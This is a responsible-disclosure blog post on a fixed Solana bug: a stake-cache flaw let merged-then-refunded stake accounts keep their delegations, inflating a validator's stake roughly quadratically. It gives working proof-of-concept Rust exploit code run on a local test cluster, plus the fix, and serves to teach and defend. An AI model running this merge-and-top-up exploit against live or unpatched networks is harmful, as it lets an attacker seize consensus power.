Stake², or How To Cheat The Staking Mechanism - Exploring Solana Core Part 2

Intro

Over the past two years, we have spent a lot of time reviewing Solana core code, reporting over 80 bugs of varying severity. This is the second in a series of blog posts detailing the vulnerabilities we found most interesting among those we reported in Solana Core. All bugs were responsibly disclosed under the Solana bug bounty program and subsequently fixed. With this series, we hope to inspire more whitehats to help keep the ecosystem safe. In this post, we present a vulnerability that would have allowed us to give an unlimited amount of stake to our own or a cooperating validator.

The Bug

As Solana is a proof-of-stake network, users can stake their SOL with a validator, locking the funds in order to give that validator more voting power and more leader slots. This makes stake critical from a security perspective: a set of validators controlling more than 1/3 of the stake can halt the network, and one controlling more than 2/3 has full control over which transactions land and which do not.
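
The two thresholds can be written as integer comparisons. This is a simplified sketch with hypothetical function names (they are not Solana APIs), assuming `stake` and `total` are active stake measured in the same unit; cross-multiplying in u128 avoids both floating-point rounding and overflow.

```rust
/// Hypothetical helper: does `stake` exceed 1/3 of `total` (enough to halt the network)?
fn can_halt(stake: u64, total: u64) -> bool {
    // stake / total > 1/3  <=>  3 * stake > total
    3 * u128::from(stake) > u128::from(total)
}

/// Hypothetical helper: does `stake` exceed 2/3 of `total` (control over which transactions land)?
fn has_supermajority(stake: u64, total: u64) -> bool {
    // stake / total > 2/3  <=>  3 * stake > 2 * total
    3 * u128::from(stake) > 2 * u128::from(total)
}
```

Exactly 1/3 or exactly 2/3 is not enough under these strict comparisons: `can_halt(1, 3)` and `has_supermajority(2, 3)` are both false.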

To stake with a validator, you first create a stake account and then delegate it to the validator's vote account. After a one-epoch warm-up period, this stake is activated, increasing the validator's voting power and number of leader slots.
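
As a rough mental model, this lifecycle can be sketched as a small state machine. The enum and its methods below are hypothetical and heavily simplified: the real stake program also tracks rent-exempt reserves, authorities and lockups, and rate-limits how much new stake can warm up per epoch, so a large delegation may take more than one epoch to become fully active.

```rust
/// Hypothetical, simplified stake account (not the stake program's real state type).
#[derive(Debug, Clone, PartialEq)]
enum StakeAccount {
    /// Created and funded, but not yet delegated.
    Initialized { lamports: u64 },
    /// Delegated to the vote account `voter` during `activation_epoch`.
    Delegated { lamports: u64, voter: &'static str, activation_epoch: u64 },
}

impl StakeAccount {
    /// Delegates an initialized account in `epoch`; any other state is returned
    /// unchanged (re-delegation is out of scope for this sketch).
    fn delegate(self, voter: &'static str, epoch: u64) -> StakeAccount {
        match self {
            StakeAccount::Initialized { lamports } => StakeAccount::Delegated {
                lamports,
                voter,
                activation_epoch: epoch,
            },
            other => other,
        }
    }

    /// Vote account this stake counts toward, if delegated.
    fn voter(&self) -> Option<&'static str> {
        match self {
            StakeAccount::Delegated { voter, .. } => Some(*voter),
            _ => None,
        }
    }

    /// Stake counted for the voter in `epoch`: nothing during the activation
    /// epoch, the full balance from the following epoch on (warm-up limits ignored).
    fn effective_stake(&self, epoch: u64) -> u64 {
        match self {
            StakeAccount::Delegated { lamports, activation_epoch, .. } if epoch > *activation_epoch => {
                *lamports
            }
            _ => 0,
        }
    }
}
```

For example, an account delegated in epoch 5 contributes nothing in epoch 5 and its full balance from epoch 6 on.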

Many decisions a validator makes depend on how much active stake other validators have. Parsing the chain state every time this data is needed is not feasible, as parsing all stake accounts takes a long time, so Solana uses various caches instead. Because decisions are based on the contents of these caches, they must accurately represent the actual chain state; in particular, they have to be updated every time a transaction changes the chain's stake distribution. In practice, whenever an account is changed on the blockchain, Stakes::store in runtime/src/stakes.rs is called. It checks whether anything relevant to the cache has changed and updates the cache accordingly. Here is an excerpt:

//  old_stake is stake lamports and voter_pubkey from the pre-store() version
let old_stake = self.stake_delegations.get(pubkey).map(|delegation| {
    (
        delegation.voter_pubkey,
        delegation.stake(self.epoch, Some(&self.stake_history)),
    )
});

let delegation = stake_state::delegation_from(account);

let stake = delegation.map(|delegation| {
    (
        delegation.voter_pubkey,
        if account.lamports() != 0 {
            delegation.stake(self.epoch, Some(&self.stake_history))
        } else {
            // when account is removed (lamports == 0), this special `else` clause ensures
            // resetting cached stake value below, even if the account happens to be
            // still staked for some (odd) reason
            0
        },
    )
});

// if adjustments need to be made...
if stake != old_stake {
    if let Some((voter_pubkey, stake)) = old_stake {
        self.vote_accounts.sub_stake(&voter_pubkey, stake);
    }
    if let Some((voter_pubkey, stake)) = stake {
        self.vote_accounts.add_stake(&voter_pubkey, stake);
    }
}

if account.lamports() == 0 {
    // when account is removed (lamports == 0), remove it from Stakes as well
    // so that given `pubkey` can be used for any owner in the future, while not
    // affecting Stakes.
    self.stake_delegations.remove(pubkey);
} else if let Some(delegation) = delegation {
    self.stake_delegations.insert(*pubkey, delegation);
}

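The account passed in at this point is a stake account whose owner delegated SOL to a validator. First, the function looks up the cached delegation from before this transaction was executed (the voter and the stake amount) and parses the delegation from the account's new state. If the two differ, the cache is updated: the old stake is subtracted from the old voter, and the new stake is added to the new voter. Finally, the delegation cache stake_delegations is updated: the entry is removed if the account has zero lamports, and otherwise overwritten with the new delegation if one could be parsed.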
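
The adjustment step can be reduced to a few lines. The sketch below is a hypothetical toy model, not the runtime's code: voters are plain strings instead of Pubkeys, and the per-voter totals are a HashMap standing in for vote_accounts with its sub_stake/add_stake methods.

```rust
use std::collections::HashMap;

/// Toy stand-in for the cached per-vote-account totals (`vote_accounts`).
type VoteTotals = HashMap<&'static str, u64>;

/// Mirrors the "if adjustments need to be made" step of the excerpt.
/// `old`: cached (voter, stake) from before the transaction.
/// `new`: (voter, stake) parsed from the updated account, None if none parses.
fn adjust(
    totals: &mut VoteTotals,
    old: Option<(&'static str, u64)>,
    new: Option<(&'static str, u64)>,
) {
    if new != old {
        if let Some((voter, stake)) = old {
            // Like sub_stake: remove the previous contribution
            // (saturating here only to keep the toy model panic-free).
            let total = totals.entry(voter).or_insert(0);
            *total = total.saturating_sub(stake);
        }
        if let Some((voter, stake)) = new {
            // Like add_stake: add the new contribution.
            *totals.entry(voter).or_insert(0) += stake;
        }
    }
}
```

For example, re-delegating 100 units from voter A to voter B subtracts them from A and adds them to B, while storing an unchanged delegation leaves the totals alone.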

There is one more case that has to be covered, however. Solana allows active stake accounts to be merged. A merge closes one stake account and adds its stake to the other one, with no warm-up or cool-down required. In this case, the closed account's data is zeroed, so no delegation can be parsed from its new state, yet the merge still changes the effective stake and the closed account's cached delegation has to go away. The implementation tries to detect this case by checking whether account.lamports() == 0.

Usually this works, as the stake program closes an account by zeroing its data and setting its lamports to 0. However, what happens if the same transaction contains another instruction afterwards that puts lamports back into the account? Then the account no longer has a zero balance, so the check fails and the delegation is not removed from the cache. The merge adds the closed account's stake to the other delegation, but the closed account's own delegation stays in the cache as well.
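
The effect on the delegation cache can be reproduced with a toy model of the final insert/remove step. The names below are hypothetical and the cache is a HashMap keyed by account name; as in the excerpt, removal only happens when the balance is zero. Note that in the excerpt the vote-account totals are still decremented in this case, because the parsed stake (None) differs from the cached one; only stake_delegations keeps the stale entry.

```rust
use std::collections::HashMap;

/// Toy stand-in for `stake_delegations`: account name -> (voter, stake).
type Delegations = HashMap<&'static str, (&'static str, u64)>;

/// Final insert/remove step of the pre-fix `Stakes::store`: removal is keyed
/// on a zero balance, not on whether a delegation still parses.
fn store_pre_fix(
    cache: &mut Delegations,
    account: &'static str,
    lamports: u64,
    delegation: Option<(&'static str, u64)>,
) {
    if lamports == 0 {
        cache.remove(account);
    } else if let Some(d) = delegation {
        cache.insert(account, d);
    }
    // Non-zero balance but no delegation: the old entry is left untouched.
}

/// What the cache sees after one transaction that merges `src` into `dst`
/// and then transfers `top_up` lamports back into the closed `src`.
/// Toy assumptions: stake == lamports, and both accounts delegate to the same voter.
fn merge_then_top_up(cache: &mut Delegations, src: &'static str, dst: &'static str, top_up: u64) {
    let (voter, src_stake) = cache[src];
    let (_, dst_stake) = cache[dst];
    let merged = dst_stake + src_stake;
    store_pre_fix(cache, dst, merged, Some((voter, merged)));
    // The closed account's data is zeroed, so no delegation parses from it.
    store_pre_fix(cache, src, top_up, None);
}
```

With `top_up` set to 0 the source entry is removed as intended; with any non-zero top-up, its old delegation survives next to the merged one.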

Can this already be exploited? Not quite, as this cache is not used directly. It is, however, used to calculate the total stake of a vote account, which sums up all delegations to it. This only happens in two situations: (1) at epoch boundaries, where the cache would have been fixed anyway, and (2) when a vote account is created. So why do we consider this an interesting vulnerability? In Solana, when a vote account is destroyed, the delegations pointing to it remain, so when it is recreated, its total stake has to be recomputed from them. The last piece of the puzzle, then, is to delete and recreate the vote account after merging the delegations.
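
The recomputation can be sketched as a sum over all cached delegations that point at the vote account. The function name and the map layout (account name -> (voter, stake)) are hypothetical and only illustrate why a stale entry inflates the result.

```rust
use std::collections::HashMap;

/// Hypothetical sketch: recompute a vote account's total stake by summing
/// every cached delegation that points at `voter`, as on (re)creation.
fn recompute_vote_stake(delegations: &HashMap<&str, (&str, u64)>, voter: &str) -> u64 {
    delegations
        .values()
        .filter(|(v, _)| *v == voter)
        .map(|(_, stake)| *stake)
        .sum()
}
```

With a cache left behind by a merge plus top-up (a stale `src -> (V, 50)` entry next to `dst -> (V, 60)`), only 60 units of real stake exist, yet the recomputed total for V is 110.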

The Exploit

To reproduce the bug, we set up our own cluster using solana-test-validator with a very short epoch, and wrote the exploit using our PoC framework.

First, we need to set up the environment and fetch the vote account of the single validator on our cluster:

let client = localhost_client();
let mut env = RemoteEnvironment::new(
    localhost_client(),
    read_keypair_file("rich-boi.json").unwrap(),
);
let payer = &env.payer();

let vote_acc = Pubkey::from_str(
    client.get_vote_accounts().unwrap().current[0]
        .vote_pubkey
        .as_str(),
)
.unwrap();

To demonstrate this vulnerability, we use four stake accounts in total: one with 1000 SOL and three with just 1 SOL each:

let big_stake = keypair(0);
let little_stake: Vec<_> = (1..4).map(|i| keypair(i)).collect();

env.execute_as_transaction_debug(
    &stake_instruction::create_account_and_delegate_stake(
        &payer.pubkey(),
        &big_stake.pubkey(),
        &vote_acc,
        &Authorized {
            staker: payer.pubkey(),
            withdrawer: payer.pubkey(),
        },
        &Lockup::default(),
        sol_to_lamports(1000.0),
    ),
    &[payer, &big_stake],
);

for stake in little_stake.iter() {
    env.execute_as_transaction(
        &stake_instruction::create_account_and_delegate_stake(
            &payer.pubkey(),
            &stake.pubkey(),
            &vote_acc,
            &Authorized {
                staker: payer.pubkey(),
                withdrawer: payer.pubkey(),
            },
            &Lockup::default(),
            sol_to_lamports(1.0),
        ),
        &[payer, stake],
    );
}

Now we have to wait for the next epoch so that our stake is activated:

println!("waiting for next epoch...");
thread::sleep(Duration::from_secs(30));

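Now we can exploit the vulnerability by merging the big stake account into the first small one, then that account into the next one, and so on. Each merge is followed, in the same transaction, by a transfer that puts 1 SOL back into the account that was just closed: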

env.execute_as_transaction(
    &[
        stake_instruction::merge(
            &little_stake[0].pubkey(),
            &big_stake.pubkey(),
            &payer.pubkey(),
        )[0]
        .clone(),
        system_instruction::transfer(
            &payer.pubkey(),
            &big_stake.pubkey(),
            sol_to_lamports(1.0),
        ),
    ],
    &[payer],
);

for i in 1..little_stake.len() {
    dbg!(i);
    let src = &little_stake[i - 1];
    let dst = &little_stake[i];
    env.execute_as_transaction(
        &[
            stake_instruction::merge(&dst.pubkey(), &src.pubkey(), &payer.pubkey())[0].clone(),
            system_instruction::transfer(&payer.pubkey(), &src.pubkey(), sol_to_lamports(1.0)),
        ],
        &[payer],
    );
}

After this, the vote account needs to be destroyed and recreated to force a recalculation of its total stake. In the PoC we submitted with the report, we skipped this step by patching the validator so that the total is recalculated on every vote.

After this exploit was executed, the validator had a total effective stake of 3997 SOL, even though we only had 1003 SOL available to us.

Optimizing the Exploit

So how much effective stake can we achieve in total with this exploit if we start with n lamports? Every stake account we create needs a minimum balance, which we'll call c, because it has to be rent-exempt. A straightforward strategy is to create one account containing n/2 + c lamports and n/(2c) - 1 accounts containing c lamports each. We delegate, wait for one epoch, and then merge the big account into the first small one, that one into the next, and so on, as in the exploit above. In the end, all n/(2c) delegations are still active in the cache, each carrying at least n/2 lamports of stake, for a total of at least n²/(4c), which is in O(n²). That means that, given enough time to execute transactions, we can square the amount of stake we give to our own or a cooperating validator. Note that we don't square the amount of SOL but the amount of lamports: ignoring constant factors, n² exceeds the u64 maximum of about 1.8 × 10^19 once n reaches about 4.3 × 10^9 lamports, so roughly 4 SOL is enough to overflow u64.
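
The accounting of this strategy can be checked with a few lines of arithmetic. This is a toy model under explicit assumptions: n is a multiple of 2c, an account's stake equals its lamports (the rent-exempt reserve is not subtracted), and the lamports spent on topping up closed accounts are ignored. The function name is ours.

```rust
/// Hypothetical toy accounting for the chain-merge strategy.
/// Returns (number of stake accounts, sum of all cached delegation stakes).
fn cached_stake_after_chain(n: u64, c: u64) -> (u64, u128) {
    assert!(c > 0 && n >= 2 * c && n % (2 * c) == 0, "toy model assumes n is a multiple of 2c");
    let accounts = n / (2 * c); // 1 big account + (n/(2c) - 1) small accounts
    let mut carried = u128::from(n / 2 + c); // stake of the big account
    let mut cached_total = carried; // the big account's delegation stays cached
    for _ in 1..accounts {
        // Merge the previous account into the next small one (c lamports):
        // the destination's delegation grows by c and is cached, while the
        // source's old delegation is never removed.
        carried += u128::from(c);
        cached_total += carried;
    }
    (accounts, cached_total)
}
```

With n = 100 and c = 10, for instance, the five accounts end up with cached stakes of 60, 70, 80, 90 and 100, so the cache reports 400 units of stake backed by only 100 lamports. In general the sum is n²/(4c) + c·k(k+1)/2 with k = n/(2c), so for a fixed c it grows quadratically in n.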

The Fix

We reported this vulnerability to the Solana team through their bug bounty program right away, on 09/14/2021. The issue was fixed in this commit, which added a feature that removes a delegation from the cache whenever the account no longer deserializes to a delegation, instead of checking for a zero balance:

let remove_delegation = if remove_delegation_on_inactive {
    delegation.is_none()
} else {
    account.lamports() == 0
};
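
The difference between the two conditions can be made concrete with a small, hypothetical helper that mirrors the snippet above; `has_delegation` stands for whether `delegation` is `Some`. For the merged-and-topped-up account from the exploit (non-zero balance, no delegation), only the new condition removes the cached entry.

```rust
/// Hypothetical mirror of the fixed removal condition.
/// `remove_delegation_on_inactive`: whether the feature from the fix is active.
/// `has_delegation`: whether the account still deserializes to a delegation.
fn should_remove(remove_delegation_on_inactive: bool, lamports: u64, has_delegation: bool) -> bool {
    if remove_delegation_on_inactive {
        // New rule: drop the entry whenever no delegation can be parsed.
        !has_delegation
    } else {
        // Old rule: drop the entry only when the balance is zero.
        lamports == 0
    }
}
```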

With this blog post, we hope to have made you curious about our work. There will be more posts detailing important vulnerabilities that we found. Stay tuned.